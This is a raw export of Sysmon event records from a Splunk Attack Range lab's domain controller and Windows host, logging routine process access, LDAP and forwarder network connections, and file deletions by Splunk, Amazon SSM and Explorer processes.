10:59:04.201{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293633Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:04.201{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293632Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:04.201{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293631Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:04.201{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1378-6216-6E06-000000003802}1016C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293630Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:04.201{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1378-6216-6E06-000000003802}1016C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293629Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:04.203{C8EA50B7-1378-6216-6E06-000000003802}1016C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000293628Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:01.659{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53821-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000293640Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:05.771{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B18415F7598FA19AAA28797ADD6CCB2,SHA256=84E3BEB76CC436366DF389D89D948444794A19FAA07845BC78C9FE4B99241665,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218126Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:05.535{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0874885B047E971224AA177C1A89FB58,SHA256=7B3C8B06216B3A8541F78CD2A11B6FE28D2910C9A2BCAF18361FA94A0DE4054E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293639Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:03.262{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53822-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000293638Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:03.262{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53822-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000293641Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:06.791{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CC9645F4E0224E861942B9DD184EFEB,SHA256=AFB23D6B1BE6977D6B6E73434AEAECB6323D9BE801F3BB5784A55C000CA4DD24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218127Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:06.551{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00803C179183FE94268D6B1828436E2E,SHA256=6482B33B87E4848BBEE5F7C7895BFA7B4E88D3F988CECDB9EC9B528F4688C219,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293642Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:07.806{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A5D88C4F55E49689D3283AB5FAB7887,SHA256=8DFC7D10FAA27911FFF287A0EE34A5B7C0DA5D9E818BCECD2BEFB10B6D98300F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218128Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:07.566{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5640ED022663BD73104C17B547402721,SHA256=F6558E2CB1380F7F6BDEF8491220C7896E2A1DB86EF8C0BDC96D5E02C293F008,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218129Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:08.582{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04BB2C84F4849A5C717F80327CCDAA7D,SHA256=81E8F40BC655D49593278CCC4378B616A0BE4D51EAF2B1DB86687B9E86A1996D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293643Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:08.823{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D57AA5A42FF98D1E4333B3BC4D5D4A9,SHA256=FD72953C319174DB72FEDBB981B07A1317FAA00A54F2818DC5F0109712951C8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218130Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:09.754{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2066D507AA78F2FE2E569000B6CDEF44,SHA256=FE0AE49F999A273EE4160B4DB3F97E3F09FBA02DB8A75C705869AAC455574F2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293644Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:09.838{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3061003EDA17D4BF0CA9E856B7CD2D1,SHA256=96CB9FE34CF8A8EF6EFF1A2CF11B09BA94FF941971454482FF9ECC7F02C21CC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218133Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:10.801{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82A4BC017B1EA55DB7C15D5936ADCAE4,SHA256=2FEF2C796BE097F786CAE20D6AAA73721EB25B862D03633E8E4878225E389107,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293654Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:10.883{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FD932D2C9C87DC0A38BB2713DF0195D,SHA256=EFD0F9C20374B1262FCDE5473E61450B8522D8FC4F6DB0D299F59012E25E4EB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218132Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:10.492{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-142MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218131Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:07.547{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51439-false10.0.1.12-8000- 10341000x8000000000000000293653Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:10.654{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293652Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:10.654{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293651Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:10.654{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293650Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:10.654{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293649Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:10.654{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293648Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:10.654{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293647Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:10.654{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293646Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:10.638{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000293645Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:07.496{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53823-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000293655Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:11.895{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E5B5A404E547268CA9FD813323B4C0A,SHA256=8200B0FCA0C5ED50EA13DB2E7F25E3574D7BECB18AB98D12A13B67177AEB3494,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218135Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:11.878{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AE7417D4EB147D6423FA0924A406625,SHA256=F9D11906C016263914705D01B51E1D5D39C9897F20449CE032C2CE87D03951D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218134Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:11.506{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-143MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293656Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:12.925{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AB9C6037CB08B86A9417B98A546B140,SHA256=C5127BD434DF22DB25BE16330C2D04E7CFBC5FA0B1293C4F671D0089230A4294,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218136Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:12.910{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=605CC8C214BE3F0C59C582C5CAAEF407,SHA256=D4AAB1489355939BB4E2619300784754EF05246EB7DC262A67051C4BF0C0F9F7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293663Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:14.925{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293662Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 